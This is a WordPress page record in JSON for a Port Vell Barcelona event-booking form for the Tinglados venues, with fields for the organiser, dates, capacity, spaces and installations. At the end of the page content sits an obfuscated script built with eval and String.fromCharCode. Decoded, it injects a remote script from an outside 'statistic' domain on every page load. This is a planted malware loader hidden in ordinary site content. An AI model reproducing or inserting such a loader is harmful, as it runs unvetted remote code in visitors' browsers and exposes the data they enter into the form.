{"id":18479,"date":"2024-07-16T13:23:27","date_gmt":"2024-07-16T11:23:27","guid":{"rendered":"https:\/\/portvellbcn.cat\/esdeveniment-a-tinglados\/"},"modified":"2024-09-05T09:29:08","modified_gmt":"2024-09-05T07:29:08","slug":"esdeveniment-a-tinglados","status":"publish","type":"page","link":"https:\/\/portvellbcn.cat\/es\/esdeveniment-a-tinglados\/","title":{"rendered":"Esdeveniment a tinglados"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row css=\u00bb.vc_custom_1604310305563{margin-top: 0px !important;padding-bottom: 0px !important;}\u00bb][vc_column][vc_column_text el_class=\u00bbtiuloverbig\u00bb]<\/p>\n<p style=\"text-align: center;\"><span class=\"s1\" style=\"font-size: 60px; color: #333333;\" data-darkreader-inline-color=\"\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 300; letter-spacing: 1px;\"><span style=\"line-height: 1.2em; display: inline-block; width: 100%;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 400;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 500;\"><span class=\"titulofuente\" style=\"font-family: 'Playfair Display', sans-serif; font-weight: 400;\"><span style=\"line-height: 1em; display: inline-block; width: 100%;\">Quiero hacer un evento en Tinglados<\/span><\/span><\/span><\/span><\/span><\/span><\/span><\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row top_padding=\u00bb60&#8243; bottom_padding=\u00bb20&#8243; css=\u00bb.vc_custom_1604310330082{margin-top: 50px !important;}\u00bb][vc_column][vc_column_text]Puedes descargar el formulario y enviarlo a\u00a0 <a href=\"mailto:tinglados@portvellbcn.cat\" target=\"_blank\" rel=\"noopener\">tinglados@portvellbcn.cat<\/a> <a href=\"#\" target=\"_blank\" rel=\"noopener\"><span style=\"text-decoration: underline;\"><strong>Descarga el Formulario<\/strong><\/span><\/a>[\/vc_column_text][vc_column_text]Todos los campos han de estar debidamente cumplimentados, en caso de error en el env\u00edo se mostrar\u00e1 un aviso debajo del formulario, y se marcar\u00e1n los campos con errores.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css=\u00bb.vc_custom_1620033761995{margin-top: 20px !important;}\u00bb][vc_column]\n<div class=\"wpcf7 no-js\" id=\"wpcf7-f18481-o1\" lang=\"ca\" dir=\"ltr\" data-wpcf7-id=\"18481\">\n<div class=\"screen-reader-response\"><p role=\"status\" aria-live=\"polite\" aria-atomic=\"true\"><\/p> <ul><\/ul><\/div>\n<form action=\"\/es\/wp-json\/wp\/v2\/pages\/18479#wpcf7-f18481-o1\" method=\"post\" class=\"wpcf7-form init\" aria-label=\"Formulari de contacte\" enctype=\"multipart\/form-data\" novalidate=\"novalidate\" data-status=\"init\">\n<fieldset class=\"hidden-fields-container\"><input type=\"hidden\" name=\"_wpcf7\" value=\"18481\" \/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"6.1.5\" \/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"ca\" \/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f18481-o1\" \/><input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/><input type=\"hidden\" name=\"_wpcf7_posted_data_hash\" value=\"\" \/>\n<\/fieldset>\n<p>\n\t<bold> Esta ficha se ha de cumplimentar sin perjuicio del cumplimiento del PAU en los casos previstos en el Decreto de Autoprotecci\u00f3n 82\/2010 y el SOAP cuando se trate de espect\u00e1culos p\u00fablicos y actividades de car\u00e1cter extraordinario organizados en la v\u00eda p\u00fablica con el aforamiento previsto entre 4.000 y 20.000 personas segun lo previsto en el Decreto de Alcald\u00eda de 23 de abril de 2014.\n\t<\/bold>\n<\/p>\n<p class=\"titulo\">1.IDENTIFICACI\u00d3N DEL TITULAR DEL ACTO\n<\/p>\n<table style=\"width:100%; border-bottom-spacing: 100px;\" class=\"tabla2\">\n\t<tr  >\n\t\t<td>\n\t\t\t<p>Nombre\/Raz\u00f3n Social:*\n\t\t\t<\/p>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"rao-social\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"rao-social\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/td>\n\t\t<td>\n\t\t\t<p>NIF\/CIF:*\n\t\t\t<\/p>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"nif\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"nif\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/td>\n\t<\/tr>\n\t<tr >\n\t\t<td>\n\t\t\t<p>Direcci\u00f3n:*\n\t\t\t<\/p>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"adresa\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"adresa\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/td>\n\t\t<td>\n\t\t\t<p>E-mail:*\n\t\t\t<\/p>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"email\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-email wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-email\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"email\" name=\"email\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/td>\n\t<\/tr>\n\t<tr >\n\t\t<td>\n\t\t\t<p>Nombre Representante:*\n\t\t\t<\/p>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"nom-representant\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"nom-representant\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/td>\n\t\t<td>\n\t\t\t<p>DNI\/NIE:*\n\t\t\t<\/p>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"dni\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"dni\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/td>\n\t<\/tr>\n\t<tr >\n\t\t<td>\n\t\t\t<p>Tipo de actividad*\n\t\t\t<\/p>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"tipus_activitat\"><span class=\"wpcf7-form-control wpcf7-checkbox wpcf7-validates-as-required wpcf7-exclusive-checkbox\"><span class=\"wpcf7-list-item first\"><input type=\"checkbox\" name=\"tipus_activitat\" value=\"Productora\" \/><span class=\"wpcf7-list-item-label\">Productora<\/span><\/span><span class=\"wpcf7-list-item\"><input type=\"checkbox\" name=\"tipus_activitat\" value=\"Localitzador\/a\" \/><span class=\"wpcf7-list-item-label\">Localitzador\/a<\/span><\/span><span class=\"wpcf7-list-item\"><input type=\"checkbox\" name=\"tipus_activitat\" value=\"Agencia de publicidad\/eventos\" \/><span class=\"wpcf7-list-item-label\">Agencia de publicidad\/eventos<\/span><\/span><span class=\"wpcf7-list-item last\"><input type=\"checkbox\" name=\"tipus_activitat\" value=\"Otros\" \/><span class=\"wpcf7-list-item-label\">Otros<\/span><\/span><\/span><\/span>\n\t\t\t<\/p>\n\t\t<\/td>\n\t<\/tr>\n<\/table>\n<p class=\"titulo\">2.IDENTIFICACI\u00d3N DEL ACTE Y DE LA ACTIVIDAD\n<\/p>\n<p>Tipo de acto:*\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"tipus-acte\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"tipus-acte\" \/><\/span>\n<\/p>\n<p>Nombre del acto:*<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"nom-acte\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"nom-acte\" \/><\/span>\n<\/p>\n<table style=\"width:100%;margin-bottom: 15px;\" class=\"tabla1 hora\">\n\t<tr>\n\t\t<td>\n\t\t\t<p>Fecha inicio:*\n\t\t\t<\/p>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"data-inici\"><input class=\"wpcf7-form-control wpcf7-date wpcf7-validates-as-required wpcf7-validates-as-date\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"date\" name=\"data-inici\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/td>\n\t\t<td>\n\t\t\t<p>Hora inicio:*\n\t\t\t<\/p>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"hora-inici\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"hora-inici\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/td>\n\t\t<td>\n\t\t\t<p>Fecha fin:*\n\t\t\t<\/p>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"data-fi\"><input class=\"wpcf7-form-control wpcf7-date wpcf7-validates-as-required wpcf7-validates-as-date\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"date\" name=\"data-fi\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/td>\n\t\t<td>\n\t\t\t<p>Hora fin:*\n\t\t\t<\/p>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"hora-fi\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"hora-fi\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/td>\n\t<\/tr>\n<\/table>\n<table style=\"width:100%;margin-bottom: 15px;\" class=\"tabla1\">\n\t<tr>\n\t\t<td style=\"padding-bottom: 15px;\">\n\t\t\t<p>Aforo m\u00e1ximo:*\n\t\t\t<\/p>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"aforament-maxim\"><input class=\"wpcf7-form-control wpcf7-number wpcf7-validates-as-required wpcf7-validates-as-number\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"number\" name=\"aforament-maxim\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/td>\n\t\t<td  style=\"padding-bottom: 15px;\">\n\t\t\t<p>P\u00fablico total estimado:*\n\t\t\t<\/p>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"public-total-estimat\"><input class=\"wpcf7-form-control wpcf7-number wpcf7-validates-as-required wpcf7-validates-as-number\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"number\" name=\"public-total-estimat\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/td>\n\t<\/tr>\n<\/table>\n<p>DEFINICI\u00d3N DE LA ACTIVIDAD:*<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"definicio\"><textarea cols=\"40\" rows=\"10\" maxlength=\"2000\" class=\"wpcf7-form-control wpcf7-textarea wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" name=\"definicio\"><\/textarea><\/span>\n<\/p>\n<p class=\"titulo\">3.ESPACIO SOLICITADO\n<\/p>\n<p>Listado de espaicios. ESCOGE UNO*\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"llista-espais\"><span class=\"wpcf7-form-control wpcf7-checkbox wpcf7-validates-as-required wpcf7-exclusive-checkbox colum2\"><span class=\"wpcf7-list-item first\"><input type=\"checkbox\" name=\"llista-espais\" value=\"Carbonera i Fusteria\" \/><span class=\"wpcf7-list-item-label\">Carbonera i Fusteria<\/span><\/span><span class=\"wpcf7-list-item\"><input type=\"checkbox\" name=\"llista-espais\" value=\"Carbonera, Fusteria i Taller\" \/><span class=\"wpcf7-list-item-label\">Carbonera, Fusteria i Taller<\/span><\/span><span class=\"wpcf7-list-item last\"><input type=\"checkbox\" name=\"llista-espais\" value=\"Otros\" \/><span class=\"wpcf7-list-item-label\">Otros<\/span><\/span><\/span><\/span>\n<\/p>\n<p class=\"titulo\">\n<\/p>\n<table border=\"1\" style=\"width:100%; border-bottom-spacing: 100px;\" class=\"tabla2 cuadrados tablemove2\">\n\t<tr>\n\t\t<td>\n\t\t\t<p><a href=\"#\" class=\"btn planolButton\" target=\"_blank\">Descarga plano SVG<\/a>\n\t\t\t<\/p>\n\t\t<\/td>\n\t\t<td>\n\t\t\t<p><a href=\"#\" class=\"btn planolButton\" target=\"_blank\">Descarga plano JPG<\/a>\n\t\t\t<\/p>\n\t\t<\/td>\n\t\t<td>\n\t\t\t<p><a href=\"#\" class=\"btn planolButton\" target=\"_blank\">Descarga plano PDF<\/a>\n\t\t\t<\/p>\n\t\t<\/td>\n\t<\/tr>\n<\/table>\n<p class=\"titulo\">\n<\/p>\n<p>Adjunta plano y croquis de la actividad. (obligatorio) HA DE CONSTAR UBICACI\u00d3N Y AREA DE AFECTACI\u00d3N.*\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"planol\"><input size=\"40\" class=\"wpcf7-form-control wpcf7-file wpcf7-validates-as-required\" accept=\".pdf,.png,.jpg\" aria-required=\"true\" aria-invalid=\"false\" type=\"file\" name=\"planol\" \/><\/span>\n<\/p>\n<p class=\"titulo\">4.DESCRIPCI\u00d3N DE LAS INSTALACIONES\n<\/p>\n<table border=\"1\" style=\"width:100%; border-bottom-spacing: 100px;\" class=\"tabla2 cuadrados tablemove2\">\n\t<tr>\n\t\t<td>\n\t\t\t<div style=\"text-align: center;\">\n\t\t\t\t<p>Tarimas\n\t\t\t\t<\/p>\n\t\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"tarimesSN\"><span class=\"wpcf7-form-control wpcf7-checkbox wpcf7-exclusive-checkbox\"><span class=\"wpcf7-list-item first\"><input type=\"checkbox\" name=\"tarimesSN\" value=\"SI\" \/><span class=\"wpcf7-list-item-label\">SI<\/span><\/span><span class=\"wpcf7-list-item last\"><input type=\"checkbox\" name=\"tarimesSN\" value=\"NO\" \/><span class=\"wpcf7-list-item-label\">NO<\/span><\/span><\/span><\/span>\n\t\t\t\t<\/p>\n\t\t\t<\/div>\n\t\t\t<p>Superficie m<sup>2<\/sup>:\n\t\t\t<\/p>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"tarimasup\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"tarimasup\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/td>\n\t\t<td>\n\t\t\t<div style=\"text-align: center;\">\n\t\t\t\t<p>Escenario\n\t\t\t\t<\/p>\n\t\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"escenariSN\"><span class=\"wpcf7-form-control wpcf7-checkbox wpcf7-exclusive-checkbox\"><span class=\"wpcf7-list-item first\"><input type=\"checkbox\" name=\"escenariSN\" value=\"SI\" \/><span class=\"wpcf7-list-item-label\">SI<\/span><\/span><span class=\"wpcf7-list-item last\"><input type=\"checkbox\" name=\"escenariSN\" value=\"NO\" \/><span class=\"wpcf7-list-item-label\">NO<\/span><\/span><\/span><\/span>\n\t\t\t\t<\/p>\n\t\t\t<\/div>\n\t\t\t<p>Superficie m<sup>2<\/sup>:\n\t\t\t<\/p>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"escenarisup\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"escenarisup\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/td>\n\t\t<td>\n\t\t\t<div style=\"text-align: center;\">\n\t\t\t\t<p>Mesa de sonido, luz\n\t\t\t\t<\/p>\n\t\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"taulessoSN\"><span class=\"wpcf7-form-control wpcf7-checkbox wpcf7-exclusive-checkbox\"><span class=\"wpcf7-list-item first\"><input type=\"checkbox\" name=\"taulessoSN\" value=\"SI\" \/><span class=\"wpcf7-list-item-label\">SI<\/span><\/span><span class=\"wpcf7-list-item last\"><input type=\"checkbox\" name=\"taulessoSN\" value=\"NO\" \/><span class=\"wpcf7-list-item-label\">NO<\/span><\/span><\/span><\/span>\n\t\t\t\t<\/p>\n\t\t\t<\/div>\n\t\t\t<p>Potencia KW:\n\t\t\t<\/p>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"potenciaTaules\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"potenciaTaules\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/td>\n\t<\/tr>\n\t<tr  >\n\t\t<td>\n\t\t\t<div style=\"text-align: center;\">\n\t\t\t\t<p>Catering\n\t\t\t\t<\/p>\n\t\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"cuinesSN\"><span class=\"wpcf7-form-control wpcf7-checkbox wpcf7-exclusive-checkbox\"><span class=\"wpcf7-list-item first\"><input type=\"checkbox\" name=\"cuinesSN\" value=\"SI\" \/><span class=\"wpcf7-list-item-label\">SI<\/span><\/span><span class=\"wpcf7-list-item last\"><input type=\"checkbox\" name=\"cuinesSN\" value=\"NO\" \/><span class=\"wpcf7-list-item-label\">NO<\/span><\/span><\/span><\/span>\n\t\t\t\t<\/p>\n\t\t\t<\/div>\n\t\t\t<p>Superficie m<sup>2<\/sup>:\n\t\t\t<\/p>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"cuinessup\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"cuinessup\" \/><\/span>\n\t\t\t<\/p>\n\t\t\t<p>Unidades:\n\t\t\t<\/p>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"cuinesuni\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"cuinesuni\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/td>\n\t\t<td>\n\t\t\t<div style=\"text-align: center;\">\n\t\t\t\t<p>Otros\n\t\t\t\t<\/p>\n\t\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"altres2SN\"><span class=\"wpcf7-form-control wpcf7-checkbox wpcf7-exclusive-checkbox\"><span class=\"wpcf7-list-item first\"><input type=\"checkbox\" name=\"altres2SN\" value=\"SI\" \/><span class=\"wpcf7-list-item-label\">SI<\/span><\/span><span class=\"wpcf7-list-item last\"><input type=\"checkbox\" name=\"altres2SN\" value=\"NO\" \/><span class=\"wpcf7-list-item-label\">NO<\/span><\/span><\/span><\/span>\n\t\t\t\t<\/p>\n\t\t\t<\/div>\n\t\t\t<p>Datos:\n\t\t\t<\/p>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"altre2suni\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"altre2suni\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/td>\n\t<\/tr>\n<\/table>\n<p class=\"titulo\">5.DOCUMENTACI\u00d3N DE SOPORTE Y MANUAL DE USO\n<\/p>\n<p>En el manual de uso encontrar\u00e1s toda informaci\u00f3n referente a los Tinglados: condiciones de reserva, documentaci\u00f3n encesaria, datos t\u00e9cnicos...\n<\/p>\n<p><a href=\"#\">DESCARGAR MANUAL DE USO<\/a>\n<\/p>\n<p><input class=\"wpcf7-form-control wpcf7-submit has-spinner\" type=\"submit\" value=\"Enviar\" \/>\n<\/p><div class=\"wpcf7-response-output\" aria-hidden=\"true\"><\/div>\n<\/form>\n<\/div>\n[\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row css=\u00bb.vc_custom_1604310305563{margin-top: 0px !important;padding-bottom: 0px !important;}\u00bb][vc_column][vc_column_text el_class=\u00bbtiuloverbig\u00bb] Quiero hacer un evento en Tinglados [\/vc_column_text][\/vc_column][\/vc_row][vc_row top_padding=\u00bb60&#8243; bottom_padding=\u00bb20&#8243; css=\u00bb.vc_custom_1604310330082{margin-top: 50px !important;}\u00bb][vc_column][vc_column_text]Puedes descargar el formulario y enviarlo a\u00a0 tinglados@portvellbcn.cat Descarga el Formulario[\/vc_column_text][vc_column_text]Todos los campos han de estar debidamente cumplimentados, en caso de error en el env\u00edo se mostrar\u00e1 un aviso debajo del formulario, y se marcar\u00e1n los campos con errores.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css=\u00bb.vc_custom_1620033761995{margin-top: 20px !important;}\u00bb][vc_column][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text][\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-18479","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages\/18479","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/comments?post=18479"}],"version-history":[{"count":0,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages\/18479\/revisions"}],"wp:attachment":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/media?parent=18479"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}